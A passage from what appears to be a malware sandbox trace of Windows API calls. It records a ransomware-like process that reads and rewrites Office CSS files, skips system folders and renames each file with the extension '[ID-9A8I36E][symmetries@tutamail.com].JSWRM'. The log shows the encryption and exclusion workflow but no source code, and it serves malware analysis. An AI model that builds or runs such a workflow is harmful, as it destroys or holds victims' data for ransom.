hHeap=0x1e0000) returned 1 [0116.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME10.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme10.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME10.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme10.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0116.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0116.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0116.989] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa4c084e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa4c084e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa50cd6f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20030, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME11.CSS", cAlternateFileName="")) returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2=".") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="..") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="...") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="windows") returned -1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="recovery") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="perflogs") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="documents and settings") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="$RECYCLE.BIN") returned 1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="system volume information") returned -1 [0116.989] lstrcmpiW (lpString1="SCHEME11.CSS", lpString2="msocache") returned 1 [0116.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0116.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME11.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME11.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME11.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0116.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0116.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME11.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME11.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME11.CSS", lpUsedDefaultChar=0x0) returned 12 [0116.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0116.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0116.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0116.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME11.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme11.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0116.990] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=131120) returned 1 [0116.990] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20030) returned 0x24c1d0 [0116.990] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x20030, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x20030, lpOverlapped=0x0) returned 1 [0117.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.027] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x20030, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x20030, lpOverlapped=0x0) returned 1 [0117.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.028] CloseHandle (hObject=0x314) returned 1 [0117.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0117.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0117.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0117.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0117.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0117.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0117.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0117.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0117.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME11.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme11.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME11.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme11.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0117.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0117.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0117.030] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e09a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME12.CSS", cAlternateFileName="")) returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2=".") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="..") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="...") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="windows") returned -1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="recovery") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="perflogs") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="documents and settings") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="system volume information") returned -1 [0117.030] lstrcmpiW (lpString1="SCHEME12.CSS", lpString2="msocache") returned 1 [0117.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0117.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME12.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME12.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME12.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0117.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0117.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME12.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME12.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME12.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0117.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0117.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0117.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0117.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME12.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme12.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.031] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=123034) returned 1 [0117.031] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e090) returned 0x24c1d0 [0117.032] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1e090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1e090, lpOverlapped=0x0) returned 1 [0117.041] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.041] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1e090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1e090, lpOverlapped=0x0) returned 1 [0117.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.042] CloseHandle (hObject=0x314) returned 1 [0117.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0117.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0117.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0117.042] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0117.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0117.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0117.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0117.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0117.042] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME12.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme12.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME12.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme12.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0117.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0117.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0117.043] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ec9a, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME13.CSS", cAlternateFileName="")) returned 1 [0117.043] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2=".") returned 1 [0117.043] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="..") returned 1 [0117.043] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="...") returned 1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="windows") returned -1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="recovery") returned 1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="perflogs") returned 1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="documents and settings") returned 1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="$RECYCLE.BIN") returned 1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="system volume information") returned -1 [0117.044] lstrcmpiW (lpString1="SCHEME13.CSS", lpString2="msocache") returned 1 [0117.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0117.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME13.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME13.CSS", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME13.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0117.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0117.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME13.CSS", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0117.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SCHEME13.CSS", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SCHEME13.CSS", lpUsedDefaultChar=0x0) returned 12 [0117.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0117.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0117.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0117.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0117.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0117.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0117.044] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME13.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme13.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0117.045] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=126106) returned 1 [0117.045] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ec90) returned 0x24c1d0 [0117.045] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1ec90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1ec90, lpOverlapped=0x0) returned 1 [0117.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0117.054] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1ec90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1ec90, lpOverlapped=0x0) returned 1 [0117.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0117.055] CloseHandle (hObject=0x314) returned 1 [0117.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0117.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0117.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0117.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0117.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0117.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0117.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0117.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0117.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0117.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0117.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0117.057] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0117.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0117.057] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0117.057] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME13.CSS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme13.css"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBFTSCM\\SCHEME13.CSS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubftscm\\scheme13.css.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0117.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0117.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0117.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0117.058] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa50cd6f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa50cd6f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xab02bf1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f5cc, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="SCHEME14.CSS", cAlternateFileName="")) returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2=".") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="..") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="...") returned 1 [0117.058] lstrcmpiW (lpString1="SCHEME14.CSS", lpString2="windows") returned -1 